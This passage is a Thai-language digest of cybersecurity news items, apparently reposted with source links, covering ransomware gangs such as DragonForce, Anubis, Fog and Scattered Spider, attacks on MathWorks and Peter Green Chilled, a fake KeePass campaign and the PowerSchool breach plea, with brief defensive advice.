เพื่อแย่งพื้นที่และพันธมิตรในโลกอาชญากรรม   • เริ่มจากการถล่มเว็บไซต์ดาร์กเว็บของ RansomHub   • เหตุเพราะ RansomHub ขยายบริการและดึงดูดเครือข่ายได้มากขึ้น ✅ ผู้เชี่ยวชาญเตือนว่าอาจเกิด “ดับเบิลรีดไถ” คือเหยื่อถูกเรียกค่าไถ่จากหลายกลุ่มพร้อมกัน   • เหมือนกรณีของ UnitedHealth Group ที่โดนรีด 2 รอบจาก 2 แก๊ง   • เสี่ยงสูญเสียข้อมูล–ชื่อเสียง–เงินทุนมากกว่าเดิม ✅ ระบบ Ransomware-as-a-Service ยังดำเนินต่อไปแม้แก๊งหลักจะพัง → แค่เปลี่ยนชื่อและ affiliate ไปอยู่กับกลุ่มใหม่ ✅ Google เตือนว่า ความไร้เสถียรภาพของโลกอาชญากรรมไซเบอร์ส่งผลโดยตรงต่อระดับภัยคุกคามของเหยื่อองค์กร ✅ บางกลุ่มเช่น Conti เคยล่มสลายหลังรัสเซียบุกยูเครน เพราะความขัดแย้งระหว่างสมาชิกจากสองประเทศ https://www.tomshardware.com/tech-industry/cyber-security/hacker-turf-war-unfolding-as-russian-dragonforce-ransomware-gang-drama-could-lead-to-double-extortionions-making-life-even-worse-for-potential-victims

Anubis Ransomware: ภัยคุกคามใหม่ที่ทำให้การกู้คืนข้อมูลเป็นไปไม่ได้ นักวิจัยด้านความปลอดภัยค้นพบ Anubis ซึ่งเป็นมัลแวร์เรียกค่าไถ่แบบ Ransomware-as-a-Service (RaaS) ที่มีความสามารถในการ เข้ารหัสและทำลายข้อมูล โดยมัลแวร์นี้สามารถลบไฟล์อย่างถาวรหลังจากเข้ารหัส ทำให้เหยื่อไม่สามารถกู้คืนข้อมูลได้ แม้จะจ่ายค่าไถ่. รายละเอียดการโจมตี ✅ Anubis สามารถเข้ารหัสข้อมูลบนระบบ Windows และมีโหมด "wipe mode" ที่สามารถลบไฟล์อย่างถาวร. ✅ มัลแวร์นี้ถูกค้นพบครั้งแรกในเดือนธันวาคม 2024 โดย Trend Micro ซึ่งพบว่ามีความคล้ายคลึงกับมัลแวร์ Sphinx. ✅ กลุ่มแฮกเกอร์ที่อยู่เบื้องหลัง Anubis กำลังขยายเครือข่าย โดยเสนอส่วนแบ่งรายได้สูงถึง 80% ให้กับผู้ร่วมขบวนการ. ✅ มัลแวร์แพร่กระจายผ่านอีเมลฟิชชิ่ง ที่ปลอมแปลงเป็นแหล่งข้อมูลที่เชื่อถือได้. ผลกระทบและข้อควรระวัง ‼️ Anubis สามารถทำให้ข้อมูลสูญหายอย่างถาวร แม้เหยื่อจะยอมจ่ายค่าไถ่. ‼️ มัลแวร์สามารถลบ Shadow Copies ทำให้การกู้คืนข้อมูลจากระบบ Windows เป็นไปไม่ได้. ‼️ องค์กรที่ตกเป็นเหยื่ออาจต้องเผชิญกับความเสียหายทางธุรกิจ เนื่องจากข้อมูลสำคัญถูกทำลาย. แนวทางป้องกัน ✅ หลีกเลี่ยงการเปิดไฟล์แนบจากอีเมลที่น่าสงสัย และตรวจสอบแหล่งที่มาของอีเมลก่อนคลิก. ✅ สำรองข้อมูลอย่างสม่ำเสมอ โดยใช้ระบบสำรองข้อมูลที่แยกออกจากเครือข่ายหลัก. ✅ ใช้ซอฟต์แวร์รักษาความปลอดภัยที่สามารถตรวจจับ Ransomware เช่น Microsoft Defender for Endpoint. ข้อมูลเพิ่มเติมเกี่ยวกับภัยคุกคามไซเบอร์ ✅ Microsoft เสนอเครื่องมือรักษาความปลอดภัยฟรีให้กับยุโรป เพื่อช่วยป้องกันการโจมตีทางไซเบอร์. ✅ ออสเตรเลียเป็นประเทศแรกที่บังคับให้เปิดเผยการจ่ายค่าไถ่ เพื่อเพิ่มความโปร่งใสในการรับมือกับ Ransomware. ‼️ มัลแวร์ที่สามารถทำลายข้อมูลอาจถูกใช้เพื่อกดดันเหยื่อให้จ่ายค่าไถ่เร็วขึ้น โดยไม่ให้โอกาสในการเจรจา. https://www.techspot.com/news/108332-anubis-ransomware-can-encrypt-destroy-data-making-file.html

🔍 กลุ่มแฮกเกอร์ Fog ใช้ซอฟต์แวร์ติดตามพนักงานโจมตีองค์กรการเงิน กลุ่มแฮกเกอร์ Fog ransomware ซึ่งเคยโจมตีสถาบันการศึกษาในสหรัฐฯ ได้เปลี่ยนกลยุทธ์ โดยใช้ ซอฟต์แวร์ติดตามพนักงาน Syteca และ เครื่องมือทดสอบเจาะระบบแบบโอเพ่นซอร์ส เพื่อเจาะระบบของสถาบันการเงินในเอเชีย 📌 วิธีการโจมตีของ Fog ransomware ✅ ใช้ซอฟต์แวร์ติดตามพนักงานเพื่อขโมยข้อมูล - Syteca (เดิมชื่อ Ekran) ถูกใช้เป็นเครื่องมือสอดแนม โดยมีฟีเจอร์ บันทึกหน้าจอและบันทึกการกดแป้นพิมพ์ - แฮกเกอร์ใช้ Stowaway เพื่อส่งไฟล์ Syteca ไปยังระบบเป้าหมาย ✅ ใช้เครื่องมือเจาะระบบโอเพ่นซอร์สเพื่อควบคุมระบบ - GC2 ใช้ Google Sheets และ Google Drive เป็นโครงสร้างควบคุม (C2) - Adaptix C2 ทำหน้าที่คล้าย Cobalt Strike beacon ในการรันคำสั่งและโหลด shellcode ✅ รักษาการเข้าถึงระบบแม้หลังจากเข้ารหัสข้อมูลแล้ว - Fog ransomware ไม่ออกจากระบบหลังจากเข้ารหัสไฟล์ แต่ยังคงอยู่เพื่อสอดแนมต่อ - ใช้บริการ SecurityHealthIron เพื่อเปิดใช้งานเครื่องมือควบคุมระยะไกล ⚠️ ความเสี่ยงและข้อควรระวัง ‼️ ซอฟต์แวร์ที่ใช้ในองค์กรอาจกลายเป็นเครื่องมือสอดแนม - Syteca เป็นซอฟต์แวร์ที่องค์กรใช้เพื่อติดตามพนักงาน แต่สามารถถูกใช้เป็นเครื่องมือสอดแนมได้ ‼️ การใช้เครื่องมือเจาะระบบโอเพ่นซอร์สทำให้การตรวจจับยากขึ้น - GC2 และ Adaptix C2 ใช้แพลตฟอร์มที่พบได้ทั่วไป เช่น Google Sheets ทำให้การตรวจจับทำได้ยาก ‼️ แฮกเกอร์อาจมีเป้าหมายที่ลึกกว่าการเรียกค่าไถ่ - การรักษาการเข้าถึงระบบหลังจากเข้ารหัสไฟล์ อาจบ่งบอกถึงเจตนาสอดแนมมากกว่าการโจมตีเพื่อเรียกค่าไถ่ 🚀 แนวทางป้องกันและอนาคตของภัยคุกคาม ✅ องค์กรควรตรวจสอบซอฟต์แวร์ติดตามพนักงานอย่างเข้มงวด - ควรมีระบบตรวจสอบว่าซอฟต์แวร์เหล่านี้ถูกใช้ในที่ที่เหมาะสม ✅ เพิ่มมาตรการป้องกันการโจมตีแบบเจาะระบบ - ใช้ระบบตรวจจับพฤติกรรมที่ผิดปกติ เช่น การใช้ Google Sheets เป็นโครงสร้างควบคุม ✅ ติดตามแนวโน้มของแฮกเกอร์ที่ใช้เครื่องมือองค์กรเป็นอาวุธ - แนวโน้มการใช้ซอฟต์แวร์องค์กรเป็นเครื่องมือโจมตีอาจเพิ่มขึ้นในอนาคต https://www.csoonline.com/article/4006743/fog-ransomware-gang-abuses-employee-monitoring-tool-in-unusual-multi-stage-attack.html

MathWorks บริษัทผู้พัฒนา MATLAB และ Simulink ซึ่งเป็นซอฟต์แวร์ด้านการคำนวณทางคณิตศาสตร์และวิศวกรรม ได้รับผลกระทบจาก การโจมตีด้วยแรนซัมแวร์ ทำให้ระบบไอทีหลายส่วนไม่สามารถใช้งานได้ โดยเหตุการณ์นี้เกิดขึ้นตั้งแต่วันที่ 18 พฤษภาคม 2025 และยังไม่สามารถกู้คืนระบบทั้งหมดได้ แรนซัมแวร์เป็นหนึ่งในภัยคุกคามไซเบอร์ที่รุนแรงที่สุดในปี 2025 โดยมีหลายบริษัทที่ถูกโจมตี เช่น Masimo, Sensata และ Hitachi Vantara ซึ่งต้องปิดระบบบางส่วนเพื่อป้องกันความเสียหาย นอกจากนี้ ยังมีความเป็นไปได้ว่าแฮกเกอร์กำลัง เจรจากับ MathWorks เพื่อเรียกค่าไถ่ ซึ่งเป็นเหตุผลที่บริษัทยังไม่เปิดเผยรายละเอียดเกี่ยวกับผู้โจมตี ✅ ข้อมูลจากข่าว - MathWorks ถูกโจมตีด้วยแรนซัมแวร์ ตั้งแต่วันที่ 18 พฤษภาคม 2025 - ระบบไอทีหลายส่วนไม่สามารถใช้งานได้ รวมถึง MATLAB Answers, Cloud Center และ File Exchange - บางระบบเริ่มกลับมาออนไลน์ แต่ยังอยู่ในสถานะ ทำงานได้ไม่เต็มที่ - MathWorks แจ้งหน่วยงานบังคับใช้กฎหมาย และกำลังทำงานร่วมกับผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์ ‼️ คำเตือนที่ควรพิจารณา - ยังไม่มีข้อมูลเกี่ยวกับผู้โจมตี และไม่ทราบว่ามีข้อมูลลูกค้าถูกขโมยหรือไม่ - แรนซัมแวร์อาจส่งผลกระทบต่อองค์กรอื่น ที่ใช้บริการของ MathWorks - บริษัทที่ใช้ MATLAB และ Simulink ควรตรวจสอบระบบของตนเอง เพื่อป้องกันความเสี่ยง - หากมีการเจรจาเรียกค่าไถ่ อาจทำให้การกู้คืนระบบล่าช้า การโจมตีครั้งนี้สะท้อนถึงความรุนแรงของแรนซัมแวร์ในปี 2025 และเป็นเครื่องเตือนใจให้บริษัทต่าง ๆ ให้ความสำคัญกับการรักษาความปลอดภัยไซเบอร์มากขึ้น https://www.techradar.com/pro/security/top-math-software-and-services-platform-still-offline-following-ransomware-attack

CISOs ควรเตรียมรับมือกับการโจมตีของ Scattered Spider Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงด้านการโจมตีองค์กรขนาดใหญ่ โดยล่าสุด Marks & Spencer, Harrods และ Co-op ในสหราชอาณาจักรตกเป็นเป้าหมาย ซึ่งสร้างความเสียหายทางธุรกิจมหาศาล และคาดว่า กลุ่มนี้จะขยายการโจมตีไปยังสหรัฐฯ 🔍 รายละเอียดสำคัญเกี่ยวกับ Scattered Spider และแนวทางป้องกัน ✅ Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีความเชี่ยวชาญด้าน Social Engineering - ใช้ เทคนิคหลอกลวงพนักงานและฝ่ายสนับสนุนลูกค้าเพื่อเข้าถึงระบบ ✅ กลุ่มนี้ร่วมมือกับ DragonForce ซึ่งเป็นกลุ่ม Ransomware-as-a-Service - DragonForce อาจมีความเกี่ยวข้องกับหน่วยข่าวกรองรัสเซีย ✅ Scattered Spider เปลี่ยนกลยุทธ์จาก Phishing เป็น Social Engineering - ใช้ SIM Swapping และการปลอมตัวเป็นพนักงานเพื่อขอรีเซ็ตรหัสผ่าน ✅ CISOs ควรให้ความสำคัญกับการฝึกอบรมพนักงานเกี่ยวกับภัยคุกคามทางไซเบอร์ - โดยเฉพาะ ฝ่ายสนับสนุนลูกค้าและพนักงานที่มีสิทธิ์เข้าถึงระบบ ✅ ควรมีระบบตรวจจับพฤติกรรมที่ผิดปกติของผู้ใช้ในเครือข่าย - เช่น การเข้าถึงข้อมูลที่ไม่เกี่ยวข้องกับหน้าที่ของพนักงาน ✅ หากถูกโจมตี ควรใช้การกู้คืนข้อมูลจาก Backup แทนการจ่ายค่าไถ่ - การจ่ายค่าไถ่ ไม่รับประกันว่าข้อมูลจะไม่ถูกเผยแพร่ https://www.csoonline.com/article/3994369/how-cisos-can-defend-against-scattered-spider-ransomware-attacks.html

Peter Green Chilled ถูกโจมตีด้วยแรนซัมแวร์ ส่งผลกระทบต่อซัพพลายเชนอาหารในสหราชอาณาจักร Peter Green Chilled บริษัทโลจิสติกส์ที่จัดส่งอาหารแช่เย็นและแช่แข็งให้กับซูเปอร์มาร์เก็ตในสหราชอาณาจักร ถูกโจมตีด้วยแรนซัมแวร์ ส่งผลให้ การดำเนินงานบางส่วนต้องหยุดชะงัก และ ตลาดค้าปลีกได้รับผลกระทบจากการขาดแคลนสินค้า 🔍 รายละเอียดสำคัญเกี่ยวกับการโจมตีแรนซัมแวร์ ✅ Peter Green Chilled แจ้งลูกค้าถึงเหตุการณ์โจมตีทางไซเบอร์เมื่อวันที่ 15 พฤษภาคม - บริษัท หยุดรับคำสั่งซื้อใหม่ชั่วคราว แต่ยังคงดำเนินการขนส่งสินค้าอยู่ ✅ ไม่มีข้อมูลเกี่ยวกับตัวตนของแฮกเกอร์หรือจำนวนเงินค่าไถ่ที่ถูกเรียกร้อง - บริษัท ยังไม่ตอบคำถามจากสื่อเกี่ยวกับรายละเอียดของการโจมตี ✅ Peter Green Chilled เป็นผู้จัดส่งสินค้าให้กับ Tesco, Sainsbury’s, Aldi, Co-op และ M&S - ส่งผลให้ ซูเปอร์มาร์เก็ตหลายแห่งต้องรับมือกับปัญหาการขาดแคลนสินค้า ✅ ธุรกิจที่พึ่งพาการจัดส่งของ Peter Green Chilled อาจสูญเสียรายได้สูงถึง $133,000 ต่อสัปดาห์ - ตัวอย่างเช่น The Black Farmer food brand ได้รับผลกระทบโดยตรงจากเหตุการณ์นี้ ✅ ผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์เรียกร้องให้ภาคโลจิสติกส์และค้าปลีกให้ความสำคัญกับการป้องกันภัยคุกคามทางไซเบอร์ - Jamie Moles จาก ExtraHop ระบุว่าความปลอดภัยไซเบอร์ในภาคโลจิสติกส์ควรได้รับการปฏิบัติอย่างเข้มงวดเช่นเดียวกับโครงสร้างพื้นฐานสำคัญ https://www.techradar.com/pro/security/co-op-and-m-and-s-food-supplier-hit-by-ransomware-attack

แฮกเกอร์แจกโปรแกรมจัดการรหัสผ่านปลอมที่ขโมยข้อมูลและติดตั้งแรนซัมแวร์ นักวิจัยด้านความปลอดภัยจาก WithSecure Threat Intelligence พบว่า แฮกเกอร์กำลังแจกจ่าย KeePass เวอร์ชันปลอม ซึ่งเป็นโปรแกรมจัดการรหัสผ่านยอดนิยม โดยเวอร์ชันปลอมนี้ มีมัลแวร์ที่สามารถขโมยข้อมูลและติดตั้งแรนซัมแวร์ 🔍 รายละเอียดสำคัญเกี่ยวกับ KeePass ปลอม ✅ มัลแวร์ใน KeePass ปลอมสามารถขโมยรหัสผ่านทั้งหมดที่ถูกบันทึกไว้ - ข้อมูลถูกส่งไปยังแฮกเกอร์ผ่าน Cobalt Strike beacon ✅ ผู้ใช้ดาวน์โหลด KeePass ปลอมจากโฆษณาบน Bing ที่นำไปยังเว็บไซต์ปลอม - เว็บไซต์นี้ เลียนแบบ KeePass ของจริง แต่มีมัลแวร์แฝงอยู่ ✅ แฮกเกอร์ใช้ข้อมูลที่ถูกขโมยเพื่อเข้าถึงเครือข่ายและติดตั้งแรนซัมแวร์ - เมื่อแรนซัมแวร์ถูกติดตั้ง องค์กรต้องจ่ายค่าไถ่เพื่อกู้คืนข้อมูล ✅ กลุ่มแฮกเกอร์ที่อยู่เบื้องหลังการโจมตีนี้ถูกระบุว่าเป็น UNC4696 - มีความเชื่อมโยงกับ Black Basta ซึ่งเป็นกลุ่มแรนซัมแวร์ที่มีชื่อเสียง ✅ เว็บไซต์ที่แจก KeePass ปลอมยังคงออนไลน์และแพร่กระจายมัลแวร์ - นักวิจัยเตือนว่า อาจมีมัลแวร์อื่น ๆ ถูกแจกจ่ายผ่านเครือข่ายนี้ https://www.techradar.com/pro/security/hackers-are-distributing-a-cracked-password-manager-that-steals-data-deploys-ransomware

นักศึกษามหาวิทยาลัยในแมสซาชูเซตส์รับสารภาพคดีแฮ็กข้อมูล PowerSchool Matthew Lane นักศึกษาวัย 19 ปีจากรัฐแมสซาชูเซตส์ตกลงรับสารภาพในคดีแฮ็กระบบคลาวด์ของ PowerSchool ซึ่งเป็นแพลตฟอร์มจัดการข้อมูลด้านการศึกษา โดยเขา ขโมยข้อมูลของนักเรียนและครูหลายล้านคน และนำไปใช้ในการเรียกค่าไถ่จากบริษัทและเขตการศึกษา 🔍 รายละเอียดสำคัญเกี่ยวกับคดีแฮ็กข้อมูล PowerSchool ✅ Matthew Lane รับสารภาพในศาลรัฐบาลกลางที่เมือง Worcester รัฐแมสซาชูเซตส์ - คดีนี้เกี่ยวข้องกับ การแฮ็กสองบริษัทและการเรียกค่าไถ่ข้อมูล ✅ PowerSchool เป็นแพลตฟอร์มที่ใช้โดยโรงเรียนหลายแห่งในสหรัฐฯ - มีข้อมูลของ นักเรียนและครูหลายล้านคน ✅ แฮ็กเกอร์ใช้ข้อมูลที่ถูกขโมยเพื่อข่มขู่บริษัทและเขตการศึกษาให้จ่ายค่าไถ่ - หากไม่จ่าย ข้อมูลอาจถูกเผยแพร่สู่สาธารณะ ✅ Lane ตกลงรับสารภาพเพื่อแลกกับข้อตกลงทางกฎหมาย - คาดว่า จะได้รับโทษที่ลดลงจากการให้ความร่วมมือกับเจ้าหน้าที่ ✅ คดีนี้สะท้อนถึงความเสี่ยงด้านความปลอดภัยไซเบอร์ในระบบการศึกษา - โรงเรียนและบริษัทด้านการศึกษาต้อง เพิ่มมาตรการป้องกันข้อมูล https://www.thestar.com.my/tech/tech-news/2025/05/21/massachusetts-college-student-to-plead-guilty-to-powerschool-data-breach